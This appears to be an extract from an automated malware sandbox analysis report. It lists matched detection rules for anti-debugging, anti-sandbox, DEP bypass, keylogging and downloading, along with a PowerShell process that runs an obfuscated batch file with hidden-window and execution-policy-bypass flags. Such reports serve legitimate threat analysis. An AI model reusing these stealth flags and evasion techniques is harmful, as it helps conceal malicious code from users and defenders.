description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
parent_process powershell.exe martian_process obf-sch_decoded.bat
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\obf-sch_decoded.bat"
option -exec bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe